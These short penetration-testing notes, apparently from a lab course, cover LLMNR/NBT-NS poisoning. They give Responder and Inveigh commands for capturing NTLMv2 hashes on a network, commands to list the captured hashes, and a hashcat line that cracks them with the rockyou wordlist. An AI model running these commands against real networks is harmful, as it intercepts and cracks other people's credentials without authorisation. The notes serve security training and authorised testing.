LLMNR NBT-NS Poisoning

Responder

sudo responder -I ens224 
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 

Inveigh

PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# version

PS C:\htb> .\Inveigh.exe

Press ESC to enter/exit interactive console

GET NTLMV2UNIQUE
GET NTLMV2USERNAMES

NTLM Relay

Last updated